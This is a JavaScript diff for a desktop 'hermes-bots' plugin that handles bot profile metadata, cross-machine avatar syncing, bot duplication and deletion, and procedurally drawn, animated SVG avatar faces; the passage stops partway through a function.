+  // Server-side (source of truth when supported): profile.yaml ui_meta,
+  // namespaced under this plugin's id — every client machine sees the same
+  // roster. Return the outcome so user-initiated saves can distinguish a
+  // cross-machine save from a local-only fallback instead of reporting a
+  // false success. Data-URL fields are stripped from ui_meta (64KB cap,
+  // rides every profiles.list); the avatar IMAGE goes to the profile asset
+  // store instead (profiles.set_asset), which is server-side and uncapped by
+  // the list call — so pfps follow the profile across machines too.
+  let serverRequest = null
+  try {
+    const { image, pet, ...rest } = next[name] || {}
+    serverRequest = Promise.resolve(host.request('profiles.configure', { name, ui_meta: { 'hermes-bots': rest } }))
+  } catch {
+    /* older/unavailable gateway — the local fallback remains saved */
+  }
+
+  // Avatar image → profile asset store (feature-detected; local storage
+  // remains the fallback rendering source on older gateways) — but only when
+  // the image actually CHANGED. Every Edit Profile save sends the image key
+  // (changed or not); a no-op `clear` from one machine can race another
+  // machine's just-pushed avatar and wipe it server-side, and a no-op
+  // `data` push re-uploads the full data URL for nothing.
+  if ('image' in patch && patch.image !== (prevMeta.image ?? null)) {
+    try {
+      const req = patch.image
+        ? host.request('profiles.set_asset', { name, asset: 'avatar', data: patch.image })
+        : host.request('profiles.set_asset', { name, asset: 'avatar', clear: true })
+      req.catch(() => undefined)
+    } catch {
+      /* older gateway */
+    }
+  }
+
+  // Three-way outcome so callers can tell a REAL remote failure from the
+  // documented legacy fallback ("older gateways reject the param shape;
+  // that's fine, local wins"):
+  //   'persisted'   — gateway confirmed applied.ui_meta === true
+  //   'unsupported' — older gateway: request rejected, or response carries
+  //                   no `applied` contract at all. Silent local fallback;
+  //                   an error toast here would fire on EVERY save forever.
+  //   'failed'      — gateway speaks the contract and explicitly reported
+  //                   the ui_meta write did NOT apply.
+  let serverOutcome = 'unsupported'
+  if (serverRequest) {
+    try {
+      const result = await serverRequest
+      if (result?.applied?.ui_meta === true) {
+        serverOutcome = 'persisted'
+      } else if (result && typeof result === 'object' && result.applied && typeof result.applied === 'object') {
+        serverOutcome = 'failed'
+      }
+    } catch {
+      /* older/unavailable gateway — the local fallback remains saved */
+    }
+  }
+
+  return { serverPersisted: serverOutcome === 'persisted', serverOutcome }
+}
+
+/** Flip the "hide Bot Chats from the sidebar" pref, persist it, and reconcile
+ *  every known canonical chat via the core session.set_hidden RPC so the change
+ *  applies to already-created Bot Chats (not just future ones). Feature-detected:
+ *  older gateways lack session.set_hidden and simply keep the chats visible. */
+async function setHideBotChats(hidden) {
+  $hideBotChats.set(hidden)
+
+  try {
+    Promise.resolve(pluginCtx?.storage?.set?.('hide-bot-chats', hidden)).catch(() => undefined)
+  } catch {
+    /* storage unavailable — pref holds for this window only */
+  }
+
+  const meta = $botMeta.get()
+  const ids = Object.values(meta)
+    .map(m => m && m.chat)
+    .filter(Boolean)
+
+  await Promise.all(
+    ids.map(sid =>
+      Promise.resolve(host.request('session.set_hidden', { session_id: sid, hidden })).catch(() => undefined)
+    )
+  )
+}
+
+/** Fetch server-side avatars for roster rows flagged has_avatar when the
+ *  local cache doesn't already have an image for them. Fire-and-forget. */
+const avatarFetchInflight = new Set()
+
+const avatarPushInflight = new Set()
+
+/** Backfill: local meta has art the server lacks -> profiles.set_asset.
+ *  Server-side avatars power the inter-agent notice pfp (core #85855) and
+ *  cross-machine roster art, so local-only images are a bug, not a state. */
+function pushLocalAvatars(roster) {
+  for (const bot of roster) {
+    if (bot.has_avatar || avatarPushInflight.has(bot.name)) {
+      continue
+    }
+
+    const image = $botMeta.get()[bot.name]?.image
+
+    if (image && typeof image === 'string' && image.startsWith('data:')) {
+      avatarPushInflight.add(bot.name)
+      host
+        .request('profiles.set_asset', { name: bot.name, asset: 'avatar', data: image })
+        .then(() => queryClient.invalidateQueries({ queryKey: ['hermes-bots', 'roster'] }))
+        .catch(() => avatarPushInflight.delete(bot.name))
+      continue
+    }
+
+    // Vector shape/color face: no image exists anywhere — rasterize the
+    // live SVG (tagged data-bot-face) to a PNG and push that, so the
+    // inter-agent notices (core #85855/#85888) can show the real pfp.
+    const svg = document.querySelector('svg[data-bot-face=' + JSON.stringify(bot.name) + ']')
+
+    if (!svg) {
+      continue
+    }
+
+    avatarPushInflight.add(bot.name)
+    rasterizeSvgToPng(svg, 160)
+      .then(png =>
+        png
+          ? host
+              .request('profiles.set_asset', { name: bot.name, asset: 'avatar', data: png })
+              .then(() => queryClient.invalidateQueries({ queryKey: ['hermes-bots', 'roster'] }))
+          : Promise.reject(new Error('rasterize failed'))
+      )
+      .catch(() => avatarPushInflight.delete(bot.name))
+  }
+}
+
+/** Serialize an inline SVG and draw it to a canvas -> PNG data URL. */
+function rasterizeSvgToPng(svgEl, size) {
+  return new Promise(resolve => {
+    try {
+      const clone = svgEl.cloneNode(true)
+      clone.setAttribute('xmlns', 'http://www.w3.org/2000/svg')
+      clone.setAttribute('width', String(size))
+      clone.setAttribute('height', String(size))
+      const markup = new XMLSerializer().serializeToString(clone)
+      const url = 'data:image/svg+xml;charset=utf-8,' + encodeURIComponent(markup)
+      const img = new Image()
+
+      img.onload = () => {
+        try {
+          const canvas = document.createElement('canvas')
+          canvas.width = size
+          canvas.height = size
+          canvas.getContext('2d').drawImage(img, 0, 0, size, size)
+          resolve(canvas.toDataURL('image/png'))
+        } catch {
+          resolve(null)
+        }
+      }
+      img.onerror = () => resolve(null)
+      img.src = url
+    } catch {
+      resolve(null)
+    }
+  })
+}
+
+/** The roster backfill draws the live SVG at 160x160. Pets are 96x104
+ *  and uploads are 256. Use that to tell a still face-copy from a real picture. */
+function isBackfilledFacePng(dataUrl) {
+  if (!dataUrl || typeof dataUrl !== 'string' || !dataUrl.startsWith('data:image/png;base64,')) {
+    return false
+  }
+
+  try {
+    const bin = atob(dataUrl.slice('data:image/png;base64,'.length).slice(0, 48))
+    if (bin.length < 24) {
+      return false
+    }
+    const w = (bin.charCodeAt(16) << 24) | (bin.charCodeAt(17) << 16) | (bin.charCodeAt(18) << 8) | bin.charCodeAt(19)
+    const h = (bin.charCodeAt(20) << 24) | (bin.charCodeAt(21) << 16) | (bin.charCodeAt(22) << 8) | bin.charCodeAt(23)
+    return w === 160 && h === 160
+  } catch {
+    return false
+  }
+}
+
+function pullServerAvatars(roster) {
+  pushLocalAvatars(roster)
+
+  for (const bot of roster) {
+    if (!bot.has_avatar || avatarFetchInflight.has(bot.name)) {
+      continue
+    }
+
+    if ($botMeta.get()[bot.name]?.image) {
+      continue
+    }
+
+    avatarFetchInflight.add(bot.name)
+    host
+      .request('profiles.get_asset', { name: bot.name, asset: 'avatar' })
+      .then(res => {
+        if (res?.found && res.data) {
+          const current = $botMeta.get()
+          const mine = current[bot.name] || {}
+          // A 160px raster of the vector face is only for inter-agent
+          // notices. Do not park it on the roster or the live face dies.
+          if (isBackfilledFacePng(res.data) && mine.imageKind !== 'photo' && !mine.pet) {
+            return
+          }
+          $botMeta.set({ ...current, [bot.name]: { ...mine, image: res.data } })
+
+          try {
+            Promise.resolve(pluginCtx?.storage?.set?.('bot-meta', $botMeta.get())).catch(() => undefined)
+          } catch {
+            /* no storage */
+          }
+        }
+      })
+      .catch(() => undefined)
+      .finally(() => avatarFetchInflight.delete(bot.name))
+  }
+}
+
+/** Server ui_meta (per roster row) beats local storage for the compact
+ *  fields it carries; local-only fields (avatar image data URL, extracted
+ *  pet icon) are PRESERVED — the server copy never includes them, so a
+ *  naive replace would wipe a just-saved image avatar on the next roster
+ *  paint. When server bot metadata exists, an omitted chat is authoritative
+ *  deletion; local still fills all gaps for older gateways with no metadata. */
+function mergeServerMeta(roster) {
+  const local = $botMeta.get()
+  let changed = false
+  const next = { ...local }
+
+  for (const bot of roster) {
+    const server = bot.ui_meta?.['hermes-bots']
+    if (server && typeof server === 'object') {
+      const mine = next[bot.name] || {}
+      const merged = { ...mine, ...server }
+
+      // Local-only fields survive the server overlay.
+      if (mine.image) {
+        merged.image = mine.image
+      }
+
+      // Server metadata is authoritative for the canonical chat pointer.
+      // Without this deletion sync, ctx.storage resurrects stale sessions
+      // after the server pin is cleared and even after a full app restart.
+      if (
+        Object.prototype.hasOwnProperty.call(mine, 'chat') &&
+        !Object.prototype.hasOwnProperty.call(server, 'chat')
+      ) {
+        delete merged.chat
+      }
+
+      if (JSON.stringify(next[bot.name] || null) !== JSON.stringify(merged)) {
+        next[bot.name] = merged
+        changed = true
+      }
+    }
+  }
+
+  if (changed) {
+    $botMeta.set(next)
+
+    // Persist server reconciliation so a relaunch cannot rehydrate stale
+    // local fields that the server intentionally removed.
+    try {
+      Promise.resolve(pluginCtx?.storage?.set?.('bot-meta', next)).catch(() => undefined)
+    } catch {
+      /* storage unavailable — reconciliation lasts for this window only */
+    }
+  }
+}
+
+/** Clone a bot: profile (config/skills/SOUL/memory via clone_from) + look.
+ *  Name is "<base>-2", "-3", … — first free slot against the live roster. */
+async function duplicateBot(bot, roster) {
+  const base = bot.name
+  let name = null
+  for (let n = 2; n < 100; n++) {
+    // Truncate the BASE, never the suffix — slicing the joined string chops
+    // the "-2" off a max-length name and the candidate collides with the
+    // base forever (#19).
+    const suffix = `-${n}`
+    const candidate = base.slice(0, 64 - suffix.length) + suffix
+    if (!roster.some(b => b.name === candidate)) {
+      name = candidate
+      break
+    }
+  }
+
+  if (!name) {
+    throw new Error('No free name for the duplicate.')
+  }
+
+  await host.request('profiles.create', {
+    name,
+    clone_from: base,
+    description: bot.description || ''
+  })
+
+  // Same look: avatar shape/color/image and a "(copy)" title so the two
+  // are tellable apart in the roster until the user renames. Do not copy
+  // chat or created. Those belong to the original bot.
+  const meta = $botMeta.get()[base]
+  if (meta) {
+    const { chat, created, ...look } = meta
+    saveBotMeta(name, {
+      ...look,
+      title: meta.title ? `${meta.title} (copy)` : ''
+    })
+  }
+
+  return name
+}
+
+/** Permanently delete a bot's Hermes profile, then remove plugin-local state
+ * that would otherwise leave stale appearance/unread data behind.
+ *
+ * Prefer the SDK's `host.deleteProfile` when this Desktop build ships it: it
+ * routes through the Electron-intercepted REST delete, which tears down the
+ * bot's pool backend FIRST and routes the next request away from it. The
+ * older `cli.exec` path bypasses that interception, so a backend that the
+ * roster's hover pre-warm just woke (right-click hovers the row!) holds the
+ * profile dir open — the CLI's rmtree races the live backend and the
+ * renderer's socket reconnect respawns it mid-delete, resurrecting the
+ * directory (hermes-agent#52279). That is the "can't delete a bot" error. */
+async function deleteBot(bot) {
+  if (typeof host.deleteProfile === 'function') {
+    await host.deleteProfile(bot.name)
+  } else {
+    // Older desktop without the SDK verb — best effort via the CLI.
+    const result = await host.request('cli.exec', {
+      argv: ['profile', 'delete', bot.name, '--yes']
+    })
+
+    if (result?.blocked || result?.code !== 0) {
+      throw new Error(result?.hint || result?.output || `Could not delete profile ${bot.name}.`)
+    }
+  }
+
+  const meta = { ...$botMeta.get() }
+  delete meta[bot.name]
+  $botMeta.set(meta)
+
+  try {
+    await Promise.resolve(pluginCtx?.storage?.set?.('bot-meta', meta))
+  } catch {
+    /* profile is deleted; stale local appearance is harmless if storage fails */
+  }
+
+  const unread = { ...$botUnread.get() }
+  delete unread[bot.name]
+  $botUnread.set(unread)
+  rosterWatermarks.delete(bot.name)
+  avatarFetchInflight.delete(bot.name)
+  avatarPushInflight.delete(bot.name)
+
+  if ($selectedBot.get() === bot.name) {
+    $selectedBot.set('default')
+  }
+
+  queryClient.invalidateQueries({ queryKey: ROSTER_KEY })
+
+  if (host.state.profile.get?.() === bot.name && typeof host.newChat === 'function') {
+    host.newChat('default')
+  }
+}
+
+// ── avatars (shape + color + eyes) ──────────────────────────────────────────
+
+// The original flat shapes. Sigils ('sigil-N') and platonic
+// solids remain render-only so any bot that picked one during the experiments
+// keeps its look.
+// Radix ScrollArea's viewport wraps children in a display:table div that
+// sizes to content — unbounded width means `truncate` below it never fires
+// and previews run through the panel edge. Scope-limited corrective.
+//
+// A second Radix quirk bites in the dialogs: the viewport is height:100%,
+// which computes to auto when the root only has max-height (no definite
+// height anywhere up the chain) — the viewport grows to full content height,
+// the root's overflow:hidden clips it, and NOTHING scrolls (#88). Capping
+// the viewport itself (inheriting the root's max-height) makes it the real
+// scroll container; lists shorter than the cap still shrink to fit.
+if (typeof document !== 'undefined' && !document.getElementById('hermes-bots-roster-css')) {
+  const style = document.createElement('style')
+  style.id = 'hermes-bots-roster-css'
+  style.textContent =
+    '.hermes-bots-roster [data-radix-scroll-area-viewport] > div {' +
+    ' display: block !important; width: 100%; min-width: 0; }' +
+    '.hermes-scroll-cap > [data-radix-scroll-area-viewport] { max-height: inherit; }' +
+    '@keyframes hermes-bots-pulse { 0%,100% { opacity: 1; } 50% { opacity: 0.35; } }' +
+    '.hermes-bots-pulse { animation: hermes-bots-pulse 1.2s ease-in-out infinite; }'
+  document.head.appendChild(style)
+}
+
+const AVATAR_SHAPES = ['circle', 'squircle', 'pill', 'triangle', 'hexagon', 'cloud', 'drop']
+const AVATAR_PICKER_SHAPES = ['circle', 'blob', 'squircle', 'pill', 'triangle', 'hexagon', 'cloud', 'drop']
+
+/** xorshift PRNG seeded from a string — stable across sessions/platforms. */
+function sigilRng(text) {
+  let h = 2166136261
+  for (const ch of text) {
+    h ^= ch.charCodeAt(0)
+    h = Math.imul(h, 16777619)
+  }
+  let state = h >>> 0 || 88675123
+  return () => {
+    state ^= state << 13
+    state ^= state >>> 17
+    state ^= state << 5
+    state >>>= 0
+    return state / 4294967296
+  }
+}
+
+/**
+ * Angular hermetic sigil: strokes on the left half of a 5-column grid,
+ * mirrored right, plus a chance of a diamond ring. Returns SVG path strings.
+ */
+function sigilGeometry(name, seed) {
+  const rng = sigilRng(`${name}::${seed}`)
+  const gx = i => 6 + i * 7 // 5 cols: 6..34
+  const gy = j => 8 + j * 6 // 5 rows: 8..32
+  const strokes = []
+  const segments = 4 + Math.floor(rng() * 3)
+
+  for (let k = 0; k < segments; k++) {
+    const x1 = Math.floor(rng() * 3) // left half incl. center
+    const y1 = Math.floor(rng() * 5)
+    const x2 = Math.min(2, Math.max(0, x1 + (rng() > 0.5 ? 1 : -1)))
+    const y2 = Math.min(4, Math.max(0, y1 + Math.floor(rng() * 3) - 1))
+
+    strokes.push(`M${gx(x1)} ${gy(y1)} L${gx(x2)} ${gy(y2)}`)
+    // mirror (col i → col 4-i)
+    strokes.push(`M${gx(4 - x1)} ${gy(y1)} L${gx(4 - x2)} ${gy(y2)}`)
+
+    // occasional cross-tie through the axis for connectedness
+    if (rng() > 0.6) {
+      strokes.push(`M${gx(x2)} ${gy(y2)} L${gx(4 - x2)} ${gy(y2)}`)
+    }
+  }
+
+  // spine down the axis grounds every variant
+  strokes.push(`M20 ${gy(0)} L20 ${gy(4)}`)
+
+  const ring = rng() > 0.45 ? 'M20 4 L36 20 L20 36 L4 20 Z' : null
+  return { strokes: strokes.join(' '), ring }
+}
+
+const AVATAR_COLORS = [
+  '#f5f5f4', // white
+  '#8d6748', // brown
+  '#ef4444', // red
+  '#f97316', // orange
+  '#14b8a6', // teal
+  '#38bdf8', // cyan
+  '#3b40c8', // royal blue
+  '#8b5cf6', // violet
+  '#ec4899', // magenta
+  '#9ca3af' // silver
+]
+
+/** Perceptual luminance — eyes/pupils flip light on dark bodies (ink, oxblood). */
+function isDarkColor(hex) {
+  try {
+    const n = parseInt(hex.slice(1), 16)
+    const r = (n >> 16) & 255
+    const g = (n >> 8) & 255
+    const b = n & 255
+    return 0.2126 * r + 0.7152 * g + 0.0722 * b < 110
+  } catch {
+    return false
+  }
+}
+
+function defaultShapeFor(name) {
+  let hash = 0
+  for (const ch of name) {
+    hash = (hash * 31 + ch.charCodeAt(0)) >>> 0
+  }
+  return AVATAR_SHAPES[hash % AVATAR_SHAPES.length]
+}
+
+/** The colored body of the avatar (no eyes). Platonic solids are a filled
+ *  silhouette + translucent internal edge lines (the projected wireframe);
+ *  legacy flat shapes keep their old geometry so stored picks still render. */
+function shapeNode(shape, color, botName = 'agent') {
+  if (shape.startsWith('sigil-')) {
+    const seed = Number(shape.slice(6)) || 0
+    const { strokes, ring } = sigilGeometry(botName, seed)
+    const sw = { fill: 'none', stroke: color, strokeWidth: 2.2, strokeLinecap: 'round', strokeLinejoin: 'round' }
+    return jsxs('g', {
+      children: [
+        ring ? jsx('path', { d: ring, fill: 'none', stroke: color, strokeWidth: 1.2, opacity: 0.5 }) : null,
+        jsx('path', { d: strokes, ...sw })
+      ]
+    })
+  }
+
+  const stroke = { fill: color, stroke: color, strokeWidth: 7, strokeLinejoin: 'round' }
+  const edge = { fill: 'none', stroke: 'rgba(0,0,0,0.4)', strokeWidth: 1.4, strokeLinejoin: 'round', strokeLinecap: 'round' }
+  const face = { fill: color, stroke: 'rgba(0,0,0,0.4)', strokeWidth: 1.4, strokeLinejoin: 'round' }
+
+  switch (shape) {
+    // ── platonic solids ──
+    case 'tetrahedron':
+      return jsxs('g', {
+        children: [
+          jsx('path', { d: 'M20 5 L36 33 L4 33 Z', ...face }),
+          jsx('path', { d: 'M20 5 L20 25 M4 33 L20 25 M36 33 L20 25', ...edge })
+        ]
+      })
+    case 'cube':
+      return jsxs('g', {
+        children: [
+          jsx('path', { d: 'M20 4 L33 11 L33 29 L20 36 L7 29 L7 11 Z', ...face }),
+          jsx('path', { d: 'M7 11 L20 18 L33 11 M20 18 L20 36', ...edge })
+        ]
+      })
+    case 'octahedron':
+      return jsxs('g', {
+        children: [
+          jsx('path', { d: 'M20 3 L36 20 L20 37 L4 20 Z', ...face }),
+          jsx('path', { d: 'M4 20 L36 20 M20 3 L20 37', ...edge })
+        ]
+      })
+    case 'dodecahedron':
+      return jsxs('g', {
+        children: [
+          jsx('path', {
+            d: 'M20 3 L30 6.2 L36.2 14.7 L36.2 25.3 L30 33.8 L20 37 L10 33.8 L3.8 25.3 L3.8 14.7 L10 6.2 Z',
+            ...face
+          }),
+          jsx('path', {
+            d:
+              'M20 12 L27.6 17.5 L24.7 26.5 L15.3 26.5 L12.4 17.5 Z ' +
+              'M20 12 L20 3 M27.6 17.5 L36.2 14.7 M24.7 26.5 L30 33.8 M15.3 26.5 L10 33.8 M12.4 17.5 L3.8 14.7',
+            ...edge
+          })
+        ]
+      })
+    case 'icosahedron':
+      return jsxs('g', {
+        children: [
+          jsx('path', { d: 'M20 3 L34.7 11.5 L34.7 28.5 L20 37 L5.3 28.5 L5.3 11.5 Z', ...face }),
+          jsx('path', {
+            d:
+              'M20 11 L27.8 24.5 L12.2 24.5 Z ' +
+              'M20 11 L20 3 M20 11 L34.7 11.5 M20 11 L5.3 11.5 ' +
+              'M27.8 24.5 L34.7 11.5 M27.8 24.5 L34.7 28.5 M27.8 24.5 L20 37 ' +
+              'M12.2 24.5 L5.3 11.5 M12.2 24.5 L5.3 28.5 M12.2 24.5 L20 37',
+            ...edge
+          })
+        ]
+      })
+
+    // ── legacy flat shapes (stored picks from earlier versions) ──
+    case 'squircle':
+      return jsx('rect', { x: 3, y: 3, width: 34, height: 34, rx: 11, fill: color })
+    case 'pill':
+      return jsx('rect', { x: 2, y: 7, width: 36, height: 26, rx: 13, fill: color })
+    case 'triangle':
+      return jsx('path', { d: 'M20 5.5 L36 33.5 L4 33.5 Z', ...stroke })
+    case 'hexagon':
+      return jsx('path', { d: 'M20 3.5 L34.5 11.75 L34.5 28.25 L20 36.5 L5.5 28.25 L5.5 11.75 Z', ...stroke })
+    case 'cloud':
+      return jsx('path', {
+        d: 'M11 32 a7.5 7.5 0 0 1 -1 -14.9 A9.5 9.5 0 0 1 29 12.5 A7 7 0 0 1 30 32 Z',
+        fill: color
+      })
+    case 'drop':
+      return jsx('path', { d: 'M20 3 C20 3 6 20 6 27 a14 13.5 0 0 0 28 0 C34 20 20 3 20 3 Z', fill: color })
+    default:
+      return jsx('circle', { cx: 20, cy: 20, r: 17.5, fill: color })
+  }
+}
+
+const EYE_Y = {
+  // solids: eyes sit on the upper face region, clear of the busiest edges
+  tetrahedron: 26,
+  cube: 22.5,
+  octahedron: 14.5,
+  dodecahedron: 20,
+  icosahedron: 17.5,
+  // legacy
+  circle: 17,
+  squircle: 17,
+  pill: 20,
+  triangle: 25,
+  hexagon: 17,
+  cloud: 22,
+  drop: 24
+}
+
+// Solids draw eyes slightly tighter so they read as ON a face.
+const EYE_X = {
+  tetrahedron: [16.5, 23.5],
+  cube: [15, 25],
+  octahedron: [16, 24],
+  dodecahedron: [16.5, 23.5],
+  icosahedron: [16.5, 23.5]
+}
+
+function cubicAt(p0, p1, p2, p3, t) {
+  const u = 1 - t
+  return [
+    u * u * u * p0[0] + 3 * u * u * t * p1[0] + 3 * u * t * t * p2[0] + t * t * t * p3[0],
+    u * u * u * p0[1] + 3 * u * u * t * p1[1] + 3 * u * t * t * p2[1] + t * t * t * p3[1]
+  ]
+}
+
+/** Same outline as the old GitHub drop path, so it stays a fat water drop. */
+function sampleDropRing(steps) {
+  const pts = []
+  const n = Math.max(8, Math.floor(steps / 3))
+
+  for (let i = 0; i < n; i++) {
+    pts.push(cubicAt([20, 3], [20, 3], [6, 20], [6, 27], i / n))
+  }
+
+  for (let i = 0; i <= n; i++) {
+    const t = (i / n) * Math.PI
+    pts.push([20 - 14 * Math.cos(t), 27 + 13.5 * Math.sin(t)])
+  }
+
+  for (let i = 1; i <= n; i++) {
+    pts.push(cubicAt([34, 27], [34, 20], [20, 3], [20, 3], i / n))
+  }
+
+  return pts
+}
+
+function svgArc(x1, y1, rx, ry, fa, fs, x2, y2) {
+  const dx = (x1 - x2) / 2
+  const dy = (y1 - y2) / 2
+  let rx2 = rx * rx
+  let ry2 = ry * ry
+  const lam = (dx * dx) / rx2 + (dy * dy) / ry2
+  if (lam > 1) {
+    const s = Math.sqrt(lam)
+    rx *= s
+    ry *= s
+    rx2 = rx * rx
+    ry2 = ry * ry
+  }
+  const num = rx2 * ry2 - rx2 * dy * dy - ry2 * dx * dx
+  const den = rx2 * dy * dy + ry2 * dx * dx
+  let sq = Math.sqrt(Math.max(0, num / den))
+  if (fa === fs) {
+    sq = -sq
+  }
+  const cx = sq * (rx * dy / ry) + (x1 + x2) / 2
+  const cy = sq * (-ry * dx / rx) + (y1 + y2) / 2
+  const ang = (ux, uy, vx, vy) => {
+    const n = Math.hypot(ux, uy) * Math.hypot(vx, vy) || 1
+    let a = Math.acos(Math.max(-1, Math.min(1, (ux * vx + uy * vy) / n)))
+    if (ux * vy - uy * vx < 0) {
+      a = -a
+    }
+    return a
+  }
+  const theta1 = ang(1, 0, (x1 - cx) / rx, (y1 - cy) / ry)
+  let dtheta = ang((x1 - cx) / rx, (y1 - cy) / ry, (x2 - cx) / rx, (y2 - cy) / ry)
+  if (!fs && dtheta > 0) {
+    dtheta -= Math.PI * 2
+  }
+  if (fs && dtheta < 0) {
+    dtheta += Math.PI * 2
+  }
+  return { cx, cy, rx, ry, theta1, dtheta }
+}
+
+function sampleArc(arc, n) {
+  const pts = []
+  for (let i = 0; i < n; i++) {
+    const th = arc.theta1 + arc.dtheta * (i / n)
+    pts.push([arc.cx + arc.rx * Math.cos(th), arc.cy + arc.ry * Math.sin(th)])
+  }
+  return pts
+}
+
+/** Same outline as the old GitHub cloud path: three puffs and a flat floor. */
+function sampleCloudRing(steps) {
+  const a1 = svgArc(11, 32, 7.5, 7.5, 0, 1, 10, 17.1)
+  const a2 = svgArc(10, 17.1, 9.5, 9.5, 0, 1, 29, 12.5)
+  const a3 = svgArc(29, 12.5, 7, 7, 0, 1, 30, 32)
+  const len1 = Math.abs(a1.dtheta) * a1.rx
+  const len2 = Math.abs(a2.dtheta) * a2.rx
+  const len3 = Math.abs(a3.dtheta) * a3.rx
+  const len4 = 19
+  const total = len1 + len2 + len3 + len4
+  const n = Math.max(64, steps)
+  const n1 = Math.max(8, Math.round(n * len1 / total))
+  const n2 = Math.max(10, Math.round(n * len2 / total))
+  const n3 = Math.max(10, Math.round(n * len3 / total))
+  const n4 = Math.max(4, n - n1 - n2 - n3)
+  const pts = []
+  pts.push(...sampleArc(a1, n1))
+  pts.push(...sampleArc(a2, n2))
+  pts.push(...sampleArc(a3, n3))
+  for (let i = 0; i < n4; i++) {
+    pts.push([30 + (11 - 30) * (i / n4), 32])
+  }
+  return pts
+}
+
+/** Outline of a face in a 40x40 box. Same family as Grok Bot
+ *  (blob / squircle / pebble / \u2026) but sampled from formulas, not
+ *  a dumped point cloud. */
+function sampleFaceRing(shape, steps = 52) {
+  const kind = (shape || '').startsWith('sigil-') ? 'circle' : shape
+
+  if (kind === 'drop' || kind === 'teardrop') {
+    return sampleDropRing(steps)
+  }
+  if (kind === 'cloud') {
+    return sampleCloudRing(steps)
+  }
+  const pts = []
+
+  for (let i = 0; i < steps; i++) {
+    const a = (i / steps) * Math.PI * 2 - Math.PI / 2
+    const c = Math.cos(a)
+    const s = Math.sin(a)
+    let rx = 16
+    let ry = 16
+    if (kind === 'circle') {
+      rx = ry = 16.2
+    } else if (kind === 'blob') {
+      rx = ry = 16 + 1.7 * Math.sin(3 * a) + 0.7 * Math.cos(5 * a)
+    } else if (kind === 'squircle') {
+      const p = 5
+      const d = Math.pow(Math.abs(c) ** p + Math.abs(s) ** p, 1 / p) || 1
+      rx = ry = 16.2 / d
+    } else if (kind === 'pill') {
+      const d = Math.pow(Math.abs(c) ** 8 + Math.abs(s / 0.72) ** 8, 1 / 8) || 1
+      rx = ry = 16 / d
+    } else if (kind === 'triangle' || kind === 'tetrahedron' || kind === 'wedge') {
+      const u = (a + Math.PI / 2 + Math.PI * 2) % (Math.PI * 2)
+      const sector = (u / (Math.PI * 2 / 3)) % 1
+      rx = ry = 13.5 / Math.max(0.42, Math.cos((sector - 0.5) * 1.9))
+    } else if (kind === 'hexagon' || kind === 'hex' || kind === 'icosahedron' || kind === 'dodecahedron') {
+      const seg = Math.PI / 3
+      const hex = Math.cos(seg / 2) / Math.cos(a - seg * Math.round(a / seg))
+      rx = ry = 16.2 * hex
+    } else if (kind === 'cube' || kind === 'octahedron') {
+      const p = 3.1
+      const d = Math.pow(Math.abs(c) ** p + Math.abs(s) ** p, 1 / p) || 1
+      rx = ry = 16 / d
+    } else if (kind === 'pebble') {
+      rx = 16.4 * (1.04 - 0.14 * Math.cos(2 * a))
+      ry = 15.2 * (1.06 + 0.08 * Math.sin(2 * a))
+    } else {
+      rx = ry = 16.2
+    }
+
+    pts.push([20 + rx * c, 20 + ry * s])
+  }
+
+  return pts
+}
+
+function projectFacePoint(x, y, turn, tilt, roll) {
+  const dx = x - 20
+  const dy = y - 20
+  const r = (roll * Math.PI) / 180
+  const xr = dx * Math.cos(r) - dy * Math.sin(r)
+  const yr = dx * Math.sin(r) + dy * Math.cos(r)
+  const sx = 0.74 + 0.26 * Math.abs(Math.cos((turn * Math.PI) / 180))
+  const sy = 0.8 + 0.2 * Math.abs(Math.cos((tilt * Math.PI) / 180))
+  return [20 + xr * sx, 20 + yr * sy]
+}
+
+function ringToPath(pts) {
+  if (!pts.length) {
+    return ''
+  }
+
+  let d = `M${pts[0][0].toFixed(2)} ${pts[0][1].toFixed(2)}`
+
+  for (let i = 1; i < pts.length; i++) {
+    d += `L${pts[i][0].toFixed(2)} ${pts[i][1].toFixed(2)}`
+  }
+
+  return d + 'Z'
+}
+
+/** Grok-style pose. thinking/working lean and sway. idle is a small sine. */
+function facePose(mood, t) {
+  if (mood === 'work') {
+    return {
+      turn: -11 + Math.sin(t * 0.48) * 8,
+      tilt: Math.sin(t * 0.42) * 8 + Math.sin(t * 1.1) * 1.6,
+      roll: Math.sin(t * 0.75) * 4.2,
+      gazeX: Math.sin(t * 0.55) * 3.6,
+      gazeY: -1.6 + Math.sin(t * 0.38) * 2,
+      blink: t % 1.45 > 1.26,
+      d0: 0.2 + 0.8 * Math.max(0, Math.sin(t * 2.6)),
+      d1: 0.2 + 0.8 * Math.max(0, Math.sin(t * 2.6 - 0.7)),
+      d2: 0.2 + 0.8 * Math.max(0, Math.sin(t * 2.6 - 1.4))
+    }
+  }
+
+  return {
+    turn: Math.sin(t * 0.5) * 1.5,
+    tilt: Math.sin(t * 0.27),
+    roll: Math.sin(t * 0.85) * 1.2,
+    gazeX: 0,
+    gazeY: 0,
+    blink: t % 3.2 > 3.02,
+    d0: 0,
+    d1: 0,
+    d2: 0
+  }
+}
+
+function paintMathFace(svg, t) {
+  const mood = svg.getAttribute('data-hb-mood') || 'idle'
+  const shape = svg.getAttribute('data-hb-shape') || 'circle'
+  const pose = facePose(mood, t)
+  const body = svg.querySelector('[data-hb-body]')
+  const open = svg.querySelector('[data-hb-open]')
+  const shut = svg.querySelector('[data-hb-shut]')
+  const el = svg.querySelector('[data-hb-el]')
+  const er = svg.querySelector('[data-hb-er]')
+  const dots = svg.querySelectorAll('[data-hb-dot]')
+
+  if (body) {
+    if (shape === 'cloud') {
+      body.setAttribute('d', 'M11 32 a7.5 7.5 0 0 1 -1 -14.9 A9.5 9.5 0 0 1 29 12.5 A7 7 0 0 1 30 32 Z')
+    } else {
+      const ring = sampleFaceRing(shape).map(([x, y]) => projectFacePoint(x, y, pose.turn, pose.tilt, pose.roll))
+      body.setAttribute('d', ringToPath(ring))
+    }
+  }
+
+  const eyeY = (shape === 'cloud' ? 22 : 17.2) + pose.gazeY
+  const eyeL = 15.4 + pose.gazeX
+  const eyeR = 24.6 + pose.gazeX
+
+  if (el) {
+    el.setAttribute('cx', eyeL)
+    el.setAttribute('cy', eyeY)
+  }
+
+  if (er) {
+    er.setAttribute('cx', eyeR)
+    er.setAttribute('cy', eyeY)
+  }
+
+  if (open) {
+    open.setAttribute('opacity', pose.blink ? '0' : '1')
+  }
+
+  if (shut) {
+    shut.setAttribute('d', `M${eyeL - 2.6} ${eyeY} L${eyeL + 2.6} ${eyeY} M${eyeR - 2.6} ${eyeY} L${eyeR + 2.6} ${eyeY}`)
+    shut.setAttribute('opacity', pose.blink ? '1' : '0')
+  }
+
